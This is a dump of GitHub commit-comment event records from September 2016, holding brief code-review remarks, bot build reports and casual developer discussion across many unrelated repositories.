{"id":"4631400199","type":"CommitCommentEvent","actor":{"login":"LeonidVeriga"},"repo":{"name":"bridgedotnet/Bridge"},"payload":{"comment":{"id":19209224,"position":46,"line":281,"path":"Bridge/Resources/Array.js","commit_id":"1addefbb0fe77ea3a614850cd6e7cc30bc7cd24f","created_at":"2016-09-28T15:22:07Z","updated_at":"2016-09-28T15:22:07Z","body":"@kcudnik, corrected [here](https://github.com/bridgedotnet/Bridge/pull/1895/commits/66a8f338e6e7fd1f2da430115cf6455c4060d88e#diff-15d8b8a04f1b52cfff89f744203cc003R281). Thanks again."}},"created_at":"2016-09-28T15:22:07Z"}
{"id":"4631403464","type":"CommitCommentEvent","actor":{"login":"victorkristof"},"repo":{"name":"kickoffai/footparse"},"payload":{"comment":{"id":19209230,"position":null,"line":null,"path":null,"commit_id":"4e2a4f72a6f5cc7ea9ba707ca21eb0a49df76d1e","created_at":"2016-09-28T15:22:35Z","updated_at":"2016-09-28T15:22:35Z","body":"Je sais pas comment tu fais pour être si rapide, je galère toujours sur le `betscraper` xD\r\n\r\nEt j'ai même pas encore commencé les tests..."}},"created_at":"2016-09-28T15:22:35Z"}
{"id":"4631404510","type":"CommitCommentEvent","actor":{"login":"franco85"},"repo":{"name":"franco85/franco85"},"payload":{"comment":{"id":19209234,"position":null,"line":null,"path":null,"commit_id":"9f3d12e80840f67444e419082ba5b701c5ab55b2","created_at":"2016-09-28T15:22:45Z","updated_at":"2016-09-28T15:22:45Z","body":"HI people good morning my name is john, one of my friends suggested me this add but i am not very clear how use it  lol "}},"created_at":"2016-09-28T15:22:45Z"}
{"id":"4631406545","type":"CommitCommentEvent","actor":{"login":"MathiasCiarlo"},"repo":{"name":"gardir/Devilry_sort"},"payload":{"comment":{"id":19209238,"position":null,"line":null,"path":null,"commit_id":"2af04a1eb23766a644462270515ac6f7113fc5b3","created_at":"2016-09-28T15:23:04Z","updated_at":"2016-09-28T15:23:04Z","body":"That was my exact thought! @gardir "}},"created_at":"2016-09-28T15:23:04Z"}
{"id":"4631407776","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"rodrigues/toniq"},"payload":{"comment":{"id":19209241,"position":null,"line":null,"path":null,"commit_id":"4f822f9e2f8f750f5648fb0ae8e8b55878a03d08","created_at":"2016-09-28T15:23:16Z","updated_at":"2016-09-28T15:23:16Z","body":"I guess that's not much of a problem if it's only Toniq using the timer, but in combination with a larger app that missuses it I can see how it's a problem."}},"created_at":"2016-09-28T15:23:16Z"}
{"id":"4631408743","type":"CommitCommentEvent","actor":{"login":"greg-1-anderson"},"repo":{"name":"consolidation/Robo"},"payload":{"comment":{"id":19209242,"position":null,"line":null,"path":null,"commit_id":"551a819e7613bed45404641e52c90f0368e9b309","created_at":"2016-09-28T15:23:25Z","updated_at":"2016-09-28T15:23:25Z","body":"The 1.0.0-stable release of Robo is imminent.  In the meantime, it is easy for you to build your own phar:\r\n```\r\n1. Clone robo & cd to the local directory\r\n2. `composer install`\r\n3. ./robo phar:build\r\n```"}},"created_at":"2016-09-28T15:23:25Z"}
{"id":"4631413561","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"satishgoda/Maya"},"payload":{"comment":{"id":19209258,"position":5,"line":19,"path":"sandbox/asQtObject/scriptEditor/QSplitter_widget_swap.py","commit_id":"dc45b67dfbdeeaf248f479338d0b31869bf22519","created_at":"2016-09-28T15:24:05Z","updated_at":"2016-09-28T15:24:05Z","body":"* http://doc.qt.io/qt-4.8/qsettings.html"}},"created_at":"2016-09-28T15:24:05Z"}
{"id":"4631413770","type":"CommitCommentEvent","actor":{"login":"Dimezis"},"repo":{"name":"OleksiiKuzmin/Dimezis"},"payload":{"comment":{"id":19209260,"position":15,"line":15,"path":"src/com/DimezisCheck/Polendrome.java","commit_id":"3bf5cc6ad7b2d2348d23f1bdc24fdbc1d0feb6e1","created_at":"2016-09-28T15:24:07Z","updated_at":"2016-09-28T15:24:07Z","body":"Missing `else` branch with `answer = false`.\r\nThis algorithm will fail the test.\r\n\r\nAnd we can stop the loop if `answer` will become `false` at some character.\r\n`if (reverseStr[i] != charStr[j]) return false`."}},"created_at":"2016-09-28T15:24:07Z"}
{"id":"4631418015","type":"CommitCommentEvent","actor":{"login":"Dimezis"},"repo":{"name":"OleksiiKuzmin/Dimezis"},"payload":{"comment":{"id":19209269,"position":12,"line":12,"path":"src/com/DimezisCheck/IsPolendrome.java","commit_id":"3bf5cc6ad7b2d2348d23f1bdc24fdbc1d0feb6e1","created_at":"2016-09-28T15:24:45Z","updated_at":"2016-09-28T15:24:45Z","body":"Minor:\r\nPlease don't leave any empty spaces.\r\nFormat carefully."}},"created_at":"2016-09-28T15:24:45Z"}
{"id":"4631418281","type":"CommitCommentEvent","actor":{"login":"shashi"},"repo":{"name":"JuliaLang/Interact.jl"},"payload":{"comment":{"id":19209270,"position":12,"line":9,"path":"deps/build.jl","commit_id":"ed4f52574f71c1c5f6f2a4c797ec61ceaf3aced9","created_at":"2016-09-28T15:24:47Z","updated_at":"2016-09-28T15:24:47Z","body":"I just remove this then?"}},"created_at":"2016-09-28T15:24:47Z"}
{"id":"4631420418","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/magicr"},"payload":{"comment":{"id":19209278,"position":null,"line":null,"path":null,"commit_id":"49c0d9965d7ce577a17b39b041f1b074a204d06f","created_at":"2016-09-28T15:25:06Z","updated_at":"2016-09-28T15:25:06Z","body":"[R/do_magic.R:6:1:](https://github.com/richelbilderbeek/magicr/blob/49c0d9965d7ce577a17b39b041f1b074a204d06f/R/do_magic.R#L6) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[R/do_magic.R:10:7:](https://github.com/richelbilderbeek/magicr/blob/49c0d9965d7ce577a17b39b041f1b074a204d06f/R/do_magic.R#L10) *style:* **Use <-, not =, for assignment.**\n```r\n​  out = x * 2;\n      ^\n```\n[R/do_magic.R:11:7:](https://github.com/richelbilderbeek/magicr/blob/49c0d9965d7ce577a17b39b041f1b074a204d06f/R/do_magic.R#L11) *style:* **Use <-, not =, for assignment.**\n```r\n​  out = replace(out, out == 84, 42);\n      ^\n```"}},"created_at":"2016-09-28T15:25:06Z"}
{"id":"4631421257","type":"CommitCommentEvent","actor":{"login":"Dimezis"},"repo":{"name":"OleksiiKuzmin/Dimezis"},"payload":{"comment":{"id":19209279,"position":13,"line":13,"path":"src/com/DimezisCheck/Main.java","commit_id":"3bf5cc6ad7b2d2348d23f1bdc24fdbc1d0feb6e1","created_at":"2016-09-28T15:25:13Z","updated_at":"2016-09-28T15:25:13Z","body":"Bracers incorrectly formatted"}},"created_at":"2016-09-28T15:25:13Z"}
{"id":"4631424523","type":"CommitCommentEvent","actor":{"login":"ddemidov"},"repo":{"name":"rhempel/ev3dev-lang-python"},"payload":{"comment":{"id":19209286,"position":null,"line":null,"path":null,"commit_id":"ced8f0f967c1550e1ca809bda9e177944fecc814","created_at":"2016-09-28T15:25:40Z","updated_at":"2016-09-28T15:25:40Z","body":"I did (rerun autogen). Does not change anything."}},"created_at":"2016-09-28T15:25:40Z"}
{"id":"4631427000","type":"CommitCommentEvent","actor":{"login":"birama"},"repo":{"name":"fellague/ConsultationManager"},"payload":{"comment":{"id":19209294,"position":null,"line":null,"path":null,"commit_id":"50b9f3dbf75d697de450f2e28f7bf89cb900edca","created_at":"2016-09-28T15:26:02Z","updated_at":"2016-09-28T15:26:02Z","body":"Great , I can help if I have more explanation."}},"created_at":"2016-09-28T15:26:02Z"}
{"id":"4631428915","type":"CommitCommentEvent","actor":{"login":"roukaour"},"repo":{"name":"roukaour/pokecrystal"},"payload":{"comment":{"id":19209297,"position":null,"line":null,"path":null,"commit_id":"4638b6faf5f302f1131f8ec87bb893a0f82cf330","created_at":"2016-09-28T15:26:19Z","updated_at":"2016-09-28T15:26:19Z","body":"Oh, I changed that while testing different sections to narrow down the problem. Restoring a's value before jumping to .loop was part of the actual fix, but the \"cp $ff; ret z\" in a later commit fixed it in all cases—I believe that \"dec a; ret c\" doesn't set the carry flag if $00 underflows to $ff.\r\n\r\nSince there's no goal here to produce an exact binary copy of Crystal, I've just gone ahead and replaced callab and callba with farcall everywhere."}},"created_at":"2016-09-28T15:26:19Z"}
{"id":"4631429304","type":"CommitCommentEvent","actor":{"login":"shashi"},"repo":{"name":"JuliaLang/Interact.jl"},"payload":{"comment":{"id":19209298,"position":9,"line":6,"path":"deps/build.jl","commit_id":"ed4f52574f71c1c5f6f2a4c797ec61ceaf3aced9","created_at":"2016-09-28T15:26:23Z","updated_at":"2016-09-28T15:26:23Z","body":"ah, shit."}},"created_at":"2016-09-28T15:26:23Z"}
{"id":"4631434108","type":"CommitCommentEvent","actor":{"login":"AlexanderS"},"repo":{"name":"aadamsx/fine-router"},"payload":{"comment":{"id":19209312,"position":4,"line":4,"path":"LICENSE","commit_id":"b7b0d1c6ed9463787ca9c0877a3485b537e20207","created_at":"2016-09-28T15:27:03Z","updated_at":"2016-09-28T15:27:03Z","body":"You really shouldn't remove copyright information."}},"created_at":"2016-09-28T15:27:03Z"}
{"id":"4631436371","type":"CommitCommentEvent","actor":{"login":"jsha"},"repo":{"name":"ietf-wg-acme/acme"},"payload":{"comment":{"id":19209317,"position":null,"line":null,"path":null,"commit_id":"2258367a139a08796e9c712ca223db604b7495c2","created_at":"2016-09-28T15:27:21Z","updated_at":"2016-09-28T15:27:21Z","body":"My intent here was not to limit how the CA builds the trust chain, but allow this sort of discretion. I think it's better to be explicit about it than to include a SHOULD NOT and expect people to read between the lines. Do you have a suggestion for language that would make that clearer?"}},"created_at":"2016-09-28T15:27:21Z"}
{"id":"4631437354","type":"CommitCommentEvent","actor":{"login":"fchovich"},"repo":{"name":"fchovich/kompozitor-web"},"payload":{"comment":{"id":19209318,"position":null,"line":null,"path":null,"commit_id":"88c3befe7a1f35b1292014587d276b73ae20f61d","created_at":"2016-09-28T15:27:30Z","updated_at":"2016-09-28T15:27:30Z","body":"ok"}},"created_at":"2016-09-28T15:27:30Z"}
{"id":"4631437461","type":"CommitCommentEvent","actor":{"login":"Dimezis"},"repo":{"name":"OleksiiKuzmin/Dimezis"},"payload":{"comment":{"id":19209319,"position":3,"line":3,"path":"src/com/DimezisCheck/MostSimplePolindrome.java","commit_id":"3bf5cc6ad7b2d2348d23f1bdc24fdbc1d0feb6e1","created_at":"2016-09-28T15:27:31Z","updated_at":"2016-09-28T15:27:31Z","body":"I like this approach. \r\n\r\nBut you need to support palindroms with spaces, comas, etc. \r\nWith complex scenarios like:\r\n`Madam, I’m Adam`\r\nThis should return `true` as well"}},"created_at":"2016-09-28T15:27:31Z"}
{"id":"4631437731","type":"CommitCommentEvent","actor":{"login":"gustavoboiuna"},"repo":{"name":"gustavoboiuna/EDL"},"payload":{"comment":{"id":19209321,"position":null,"line":null,"path":null,"commit_id":"948c8d4a0af1c30425b2763495f25152ff0b782d","created_at":"2016-09-28T15:27:33Z","updated_at":"2016-09-28T15:27:33Z","body":"Não eram apenas 6 exemplos?"}},"created_at":"2016-09-28T15:27:33Z"}
{"id":"4631438625","type":"CommitCommentEvent","actor":{"login":"pieterov"},"repo":{"name":"pieterov/DataScienceToolkit"},"payload":{"comment":{"id":19209323,"position":null,"line":null,"path":null,"commit_id":"d09f4993e3beb3a526cf98eff50b71f6078475a2","created_at":"2016-09-28T15:27:42Z","updated_at":"2016-09-28T15:27:42Z","body":"Dit is een comment dat ik via mijn iphone heb toegevoegd..\n"}},"created_at":"2016-09-28T15:27:42Z"}
{"id":"4631438924","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19209324,"position":29,"line":410,"path":"cura/BuildVolume.py","commit_id":"3de4d4987c7beb816723beeed0b5d002b650ebbc","created_at":"2016-09-28T15:27:44Z","updated_at":"2016-09-28T15:27:44Z","body":"Already fixed this. "}},"created_at":"2016-09-28T15:27:44Z"}
{"id":"4631442540","type":"CommitCommentEvent","actor":{"login":"cjhyuky"},"repo":{"name":"cjhyuky/MA-XML-MIUI8-Korean"},"payload":{"comment":{"id":19209336,"position":null,"line":null,"path":null,"commit_id":"96c67a0391cd9d8ba497541f5463f5447c4440cd","created_at":"2016-09-28T15:28:16Z","updated_at":"2016-09-28T15:28:16Z","body":"Thanks!"}},"created_at":"2016-09-28T15:28:16Z"}
{"id":"4631443971","type":"CommitCommentEvent","actor":{"login":"idris"},"repo":{"name":"r0b1n/rnrf-relay-renderer"},"payload":{"comment":{"id":19209338,"position":5,"line":50,"path":"src/RelayComponentRenderer.js","commit_id":"9560a7cd99cae4bd5be7d683619c8572882225f6","created_at":"2016-09-28T15:28:29Z","updated_at":"2016-09-28T15:28:29Z","body":"I'd recommend sending these props separately, like `routerProps={this.props}`.  I think that's what `react-router-relay` does."}},"created_at":"2016-09-28T15:28:29Z"}
{"id":"4631445031","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"Leo-Lima-Mar/EDL"},"payload":{"comment":{"id":19209344,"position":null,"line":null,"path":null,"commit_id":"bc63605beebf085dcb10feb6b2a62908c14b1381","created_at":"2016-09-28T15:28:38Z","updated_at":"2016-09-28T15:28:38Z","body":"2 dos 6 exemplos podem melhorar..."}},"created_at":"2016-09-28T15:28:38Z"}
{"id":"4631446673","type":"CommitCommentEvent","actor":{"login":"bartolomesoriano"},"repo":{"name":"mikesilvo164/skin.aeon.madnox"},"payload":{"comment":{"id":19209347,"position":null,"line":null,"path":null,"commit_id":"6374831fc9e0933976599218093a77530f489f63","created_at":"2016-09-28T15:28:53Z","updated_at":"2016-09-28T15:28:53Z","body":"@MadMikeDoc I see that you made these changes in the master branch and not the krypton branch.  Will you be incorporating into master the changes @mikesilvo164 had already done for Krypton?"}},"created_at":"2016-09-28T15:28:53Z"}
{"id":"4631451693","type":"CommitCommentEvent","actor":{"login":"akentoyo"},"repo":{"name":"akentoyo/MyFirstRepo"},"payload":{"comment":{"id":19209356,"position":null,"line":null,"path":null,"commit_id":"db0022434e7e4fdfa2d27db179b8ec3d9ad97dda","created_at":"2016-09-28T15:29:37Z","updated_at":"2016-09-28T15:29:37Z","body":"man - I would appreciate it if you let me review your code first"}},"created_at":"2016-09-28T15:29:37Z"}
{"id":"4631453915","type":"CommitCommentEvent","actor":{"login":"WasabiFan"},"repo":{"name":"rhempel/ev3dev-lang-python"},"payload":{"comment":{"id":19209362,"position":null,"line":null,"path":null,"commit_id":"ced8f0f967c1550e1ca809bda9e177944fecc814","created_at":"2016-09-28T15:29:58Z","updated_at":"2016-09-28T15:29:58Z","body":"Oh, I see; so the only thing that has a different `setter` is the LED class?"}},"created_at":"2016-09-28T15:29:58Z"}
{"id":"4631456563","type":"CommitCommentEvent","actor":{"login":"Joedang"},"repo":{"name":"psas/lv3.0-airframe"},"payload":{"comment":{"id":19209371,"position":null,"line":null,"path":null,"commit_id":"c68dd871c0536a83f946e3e1c8aa33440cd04e22","created_at":"2016-09-28T15:30:22Z","updated_at":"2016-09-28T15:30:22Z","body":"Lol, not sure how or why git swapped around who pushed the commit, but okay. "}},"created_at":"2016-09-28T15:30:22Z"}
{"id":"4631459057","type":"CommitCommentEvent","actor":{"login":"ddemidov"},"repo":{"name":"rhempel/ev3dev-lang-python"},"payload":{"comment":{"id":19209377,"position":null,"line":null,"path":null,"commit_id":"ced8f0f967c1550e1ca809bda9e177944fecc814","created_at":"2016-09-28T15:30:43Z","updated_at":"2016-09-28T15:30:43Z","body":"Yes"}},"created_at":"2016-09-28T15:30:43Z"}
{"id":"4631459988","type":"CommitCommentEvent","actor":{"login":"zanderso"},"repo":{"name":"dart-lang/sdk"},"payload":{"comment":{"id":19209379,"position":4,"line":205,"path":"runtime/vm/BUILD.gn","commit_id":"b29788329baab1183f6e430bc2cf3c4169b20621","created_at":"2016-09-28T15:30:50Z","updated_at":"2016-09-28T15:30:50Z","body":"We're trying to bring up a GN build for the standalone VM to replace gyp. This change breaks the standalone VM GN build. I'll look into why this is broken, but in the future please try to run //tools/gn.py on Linux in a Dart checkout before landing changes to the GN files."}},"created_at":"2016-09-28T15:30:50Z"}
{"id":"4631463180","type":"CommitCommentEvent","actor":{"login":"dbatiste"},"repo":{"name":"Brightspace/d2l-icons-ui"},"payload":{"comment":{"id":19209388,"position":5,"line":39,"path":"d2l-icon-button-shared-styles.html","commit_id":"5a08f117ab29ff1594740176763a3b3541e17565","created_at":"2016-09-28T15:31:16Z","updated_at":"2016-09-28T15:31:16Z","body":"Just noticed this: i was chatting with designers a while ago and they'd mentioned disabled style should be 0.75 opacity due to inadequate color contrast with 0.5.  `d2l-button` (and perhaps one or two other places) was never corrected.  Currently we have a mix.  I think we should probably double check with designer and figure out if everything should be 0.75."}},"created_at":"2016-09-28T15:31:16Z"}
{"id":"4631463429","type":"CommitCommentEvent","actor":{"login":"davidkpiano"},"repo":{"name":"davidkpiano/sassdash"},"payload":{"comment":{"id":19209390,"position":null,"line":null,"path":null,"commit_id":"1ecc1f3735784d536e37d2d47f1365042fac9881","created_at":"2016-09-28T15:31:18Z","updated_at":"2016-09-28T15:31:18Z","body":"Thanks @xzyfer, I'll see if it's missing."}},"created_at":"2016-09-28T15:31:18Z"}
{"id":"4631463535","type":"CommitCommentEvent","actor":{"login":"dsomel21"},"repo":{"name":"khotey/blog-tutorial-nodejs-react"},"payload":{"comment":{"id":19209391,"position":null,"line":null,"path":null,"commit_id":"ac79c4e6f8e4d4704a521a28d85699a85e6959f6","created_at":"2016-09-28T15:31:19Z","updated_at":"2016-09-28T15:31:19Z","body":"Sir, can I ask you a couple of questions. I am working on an application and I am having trouble with client side and server side rendering when it comes to React and Express. The application's front end is going to built with React, Redux which is good because I a enjoy working with it and have a great understanding of the workflow. We need Express for things like user authentication, but when we run webpack and run our express server, the routes will not respond to the client routes, thus it doesn't even know that React exists. I am trying hard to find solutions but they are not helping. I was wondering if I could get your insight sir. "}},"created_at":"2016-09-28T15:31:19Z"}
{"id":"4631463680","type":"CommitCommentEvent","actor":{"login":"ddemidov"},"repo":{"name":"rhempel/ev3dev-lang-python"},"payload":{"comment":{"id":19209392,"position":null,"line":null,"path":null,"commit_id":"ced8f0f967c1550e1ca809bda9e177944fecc814","created_at":"2016-09-28T15:31:19Z","updated_at":"2016-09-28T15:31:19Z","body":"Well, the Led class looks to be the only one with `from_set` kind of attribute"}},"created_at":"2016-09-28T15:31:19Z"}
{"id":"4631463845","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"Vidigan/EDL"},"payload":{"comment":{"id":19209393,"position":null,"line":null,"path":null,"commit_id":"7c9f25beb1f55b567b59bde6acc32856cc58fecf","created_at":"2016-09-28T15:31:21Z","updated_at":"2016-09-28T15:31:21Z","body":"4 dos 6 exemplos podem melhorar..."}},"created_at":"2016-09-28T15:31:21Z"}
{"id":"4631470332","type":"CommitCommentEvent","actor":{"login":"kou"},"repo":{"name":"groonga/groonga"},"payload":{"comment":{"id":19209411,"position":null,"line":null,"path":null,"commit_id":"1062efafb5993b8294cd63174132c1cefda27eaf","created_at":"2016-09-28T15:32:20Z","updated_at":"2016-09-28T15:32:20Z","body":"How about using `NGX_PCRE` defined in `ngx_auto_config.h`?"}},"created_at":"2016-09-28T15:32:20Z"}
{"id":"4631471594","type":"CommitCommentEvent","actor":{"login":"emmett9001"},"repo":{"name":"Parsely/pykafka"},"payload":{"comment":{"id":19209415,"position":null,"line":null,"path":null,"commit_id":"9f9e07df99ae05383724820cccb126a3e33ef2a4","created_at":"2016-09-28T15:32:32Z","updated_at":"2016-09-28T15:32:32Z","body":"That's a great point @jianbin-wei. If my understanding of greenlets is correct, this might be solved or at least partially addressed by adding a call to `gevent.sleep()` inside the `while not success` loop. Do you agree this might address the issue?"}},"created_at":"2016-09-28T15:32:32Z"}
{"id":"4631473279","type":"CommitCommentEvent","actor":{"login":"moeller0"},"repo":{"name":"dtaht/sch_cake"},"payload":{"comment":{"id":19209417,"position":null,"line":null,"path":null,"commit_id":"669e5b8bf3a4593261898dcd035359fd29105bbd","created_at":"2016-09-28T15:32:47Z","updated_at":"2016-09-28T15:32:47Z","body":"So I have not seen the revised code yet, but please let me repeat, for PTM we are doing just fine by multiplying the specified rate by 65/64 and use that adjusted rate, expressing the 64/65 encoding as added overhead per packet is wrong (or rather imprecise as rounding per packet is worse than rounding per rate, at least that is how I believe the numbers come down to).\r\n\r\nBest Regards\r\n        Sebastian"}},"created_at":"2016-09-28T15:32:47Z"}
{"id":"4631484497","type":"CommitCommentEvent","actor":{"login":"Dimezis"},"repo":{"name":"OleksiiKuzmin/Dimezis"},"payload":{"comment":{"id":19209444,"position":4,"line":4,"path":"src/com/DimezisCheck/IsPolendrome.java","commit_id":"3bf5cc6ad7b2d2348d23f1bdc24fdbc1d0feb6e1","created_at":"2016-09-28T15:34:30Z","updated_at":"2016-09-28T15:34:30Z","body":"This field is not needed, it's used only locally in `isPalindrome()` method"}},"created_at":"2016-09-28T15:34:30Z"}
{"id":"4631488037","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"Birajhow/EDL"},"payload":{"comment":{"id":19209449,"position":null,"line":null,"path":null,"commit_id":"b1aac581fb86b3d1589632fdc27c535ce693ba29","created_at":"2016-09-28T15:35:02Z","updated_at":"2016-09-28T15:35:02Z","body":"2 dos 6 exemplos podem melhorar..."}},"created_at":"2016-09-28T15:35:02Z"}
{"id":"4631488229","type":"CommitCommentEvent","actor":{"login":"Dimezis"},"repo":{"name":"OleksiiKuzmin/Dimezis"},"payload":{"comment":{"id":19209450,"position":17,"line":17,"path":"src/com/DimezisCheck/IsPolendrome.java","commit_id":"3bf5cc6ad7b2d2348d23f1bdc24fdbc1d0feb6e1","created_at":"2016-09-28T15:35:05Z","updated_at":"2016-09-28T15:35:05Z","body":"As below, can be just `return s.equals(reverseString(s));`"}},"created_at":"2016-09-28T15:35:05Z"}
{"id":"4631495825","type":"CommitCommentEvent","actor":{"login":"sherifzaki"},"repo":{"name":"thomich/tinymce-codemirror"},"payload":{"comment":{"id":19209470,"position":null,"line":null,"path":null,"commit_id":"e46431e3774409974da0ddce858af93ddbd13362","created_at":"2016-09-28T15:36:14Z","updated_at":"2016-09-28T15:36:14Z","body":"Hi\r\nThis is not working since it also happens inside any tag\r\nand when it works inside the javascript tag, tinymce errors when you try to click on the code again plus the tinymce won't show most of the page\r\n\r\njs error is \r\nTypeError: Argument 1 of Range.setStartBefore is not an object."}},"created_at":"2016-09-28T15:36:14Z"}
{"id":"4631496331","type":"CommitCommentEvent","actor":{"login":"Surekh"},"repo":{"name":"Brightspace/d2l-icons-ui"},"payload":{"comment":{"id":19209472,"position":5,"line":39,"path":"d2l-icon-button-shared-styles.html","commit_id":"5a08f117ab29ff1594740176763a3b3541e17565","created_at":"2016-09-28T15:36:18Z","updated_at":"2016-09-28T15:36:18Z","body":"@rlanger consulted other designers yesterday and shared this spec - \"Disabled state = Same colour just tinted back to 50%\". But may be she can double check for us again. "}},"created_at":"2016-09-28T15:36:18Z"}
{"id":"4631501071","type":"CommitCommentEvent","actor":{"login":"suman1112"},"repo":{"name":"suman1112/imad-2016-app"},"payload":{"comment":{"id":19209481,"position":null,"line":null,"path":null,"commit_id":"fc895cd580c0f1f624da887c5292bbb74e20ab73","created_at":"2016-09-28T15:36:59Z","updated_at":"2016-09-28T15:36:59Z","body":"image added"}},"created_at":"2016-09-28T15:36:59Z"}
{"id":"4631502055","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"LuizAndrade/EDL"},"payload":{"comment":{"id":19209484,"position":null,"line":null,"path":null,"commit_id":"daace1fd16ad16239875d9bc8aaa1b36b417a53a","created_at":"2016-09-28T15:37:09Z","updated_at":"2016-09-28T15:37:09Z","body":"Os exemplos podem melhorar. Escolha um nome e não uma linha inteira..."}},"created_at":"2016-09-28T15:37:09Z"}
{"id":"4631503227","type":"CommitCommentEvent","actor":{"login":"darkevilmac"},"repo":{"name":"elytra/Concrete"},"payload":{"comment":{"id":19209488,"position":11,"line":50,"path":"src/main/java/io/github/elytra/concrete/NetworkContext.java","commit_id":"6f548c490718324e7a8f0b62cc53f597bdf1edce","created_at":"2016-09-28T15:37:20Z","updated_at":"2016-09-28T15:37:20Z","body":"10/10"}},"created_at":"2016-09-28T15:37:20Z"}
{"id":"4631504027","type":"CommitCommentEvent","actor":{"login":"vavalos4816"},"repo":{"name":"vavalos4816/miproyecto"},"payload":{"comment":{"id":19209490,"position":null,"line":null,"path":null,"commit_id":"e95a043765232dd6d634fd4fd04557c86cbc6fec","created_at":"2016-09-28T15:37:27Z","updated_at":"2016-09-28T15:37:27Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Tarjeta 1.1](https://trello.com/c/OgKkiqEA/1-tarjeta-1-1)"}},"created_at":"2016-09-28T15:37:27Z"}
{"id":"4631504066","type":"CommitCommentEvent","actor":{"login":"michaelkruglos"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19209489,"position":89,"line":110,"path":"lib/tls.js","commit_id":"3ff82deb2c3bd580d64be75dbafe460393c952fb","created_at":"2016-09-28T15:37:27Z","updated_at":"2016-09-28T15:37:27Z","body":"Missing curly braces"}},"created_at":"2016-09-28T15:37:27Z"}
{"id":"4631504494","type":"CommitCommentEvent","actor":{"login":"airblock"},"repo":{"name":"octocat/Hello-World"},"payload":{"comment":{"id":19209491,"position":1,"line":1,"path":"README","commit_id":"762941318ee16e59dabbacb1b4049eec22f0d303","created_at":"2016-09-28T15:37:30Z","updated_at":"2016-09-28T15:37:30Z","body":"Hello,World!"}},"created_at":"2016-09-28T15:37:30Z"}
{"id":"4631515296","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19209510,"position":null,"line":null,"path":null,"commit_id":"5bf588f92e207cee5a2bc7ef8c9f939d29c0188a","created_at":"2016-09-28T15:39:12Z","updated_at":"2016-09-28T15:39:12Z","body":"develop (axelstudios) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2357 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5bf588f92e207cee5a2bc7ef8c9f939d29c0188a-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5bf588f92e207cee5a2bc7ef8c9f939d29c0188a-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.28%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T15:39:12Z"}
{"id":"4631515420","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19209511,"position":null,"line":null,"path":null,"commit_id":"611f6a516ed95c7a69e218e39cda27686cc2ad83","created_at":"2016-09-28T15:39:13Z","updated_at":"2016-09-28T15:39:13Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1191](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14482&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-28T15:39:13Z"}
{"id":"4631516486","type":"CommitCommentEvent","actor":{"login":"pesobitph"},"repo":{"name":"pesobitph/pesobit-source"},"payload":{"comment":{"id":19209513,"position":null,"line":null,"path":null,"commit_id":"c203d9229eb5ce08f4bd038e4018da9e8092bf2d","created_at":"2016-09-28T15:39:23Z","updated_at":"2016-09-28T15:39:23Z","body":"Pesobit MAC Wallet"}},"created_at":"2016-09-28T15:39:23Z"}
{"id":"4631518864","type":"CommitCommentEvent","actor":{"login":"mikermcneil"},"repo":{"name":"balderdashy/sails"},"payload":{"comment":{"id":19209516,"position":5,"line":32,"path":"lib/hooks/cors/index.js","commit_id":"f80252f66edc0bf00cf6ed317d9a3e68b4e8d948","created_at":"2016-09-28T15:39:43Z","updated_at":"2016-09-28T15:39:43Z","body":"https://github.com/balderdashy/sails/commit/22a514eaf8e22598a8d2f3dae85718b786593929"}},"created_at":"2016-09-28T15:39:43Z"}
{"id":"4631520680","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"rasantana/EDL"},"payload":{"comment":{"id":19209520,"position":null,"line":null,"path":null,"commit_id":"d9e4dbcfa3a3f9764559b68db7bd047646351528","created_at":"2016-09-28T15:40:00Z","updated_at":"2016-09-28T15:40:00Z","body":"Os exemplos podem melhorar. Tem 2 repetidos."}},"created_at":"2016-09-28T15:40:00Z"}
{"id":"4631522837","type":"CommitCommentEvent","actor":{"login":"LevelX2"},"repo":{"name":"magefree/mage"},"payload":{"comment":{"id":19209523,"position":null,"line":null,"path":null,"commit_id":"5b941d4c5e0d6d6aa4f8d79ee69e4beb304d0f72","created_at":"2016-09-28T15:40:19Z","updated_at":"2016-09-28T15:40:19Z","body":"Somehow the mana symbols look more worse than before now.\r\n![manasymbols](https://cloud.githubusercontent.com/assets/2066790/18920736/9a6a9b5e-85a2-11e6-80ed-fa13a30cdcf3.jpg)\r\n"}},"created_at":"2016-09-28T15:40:19Z"}
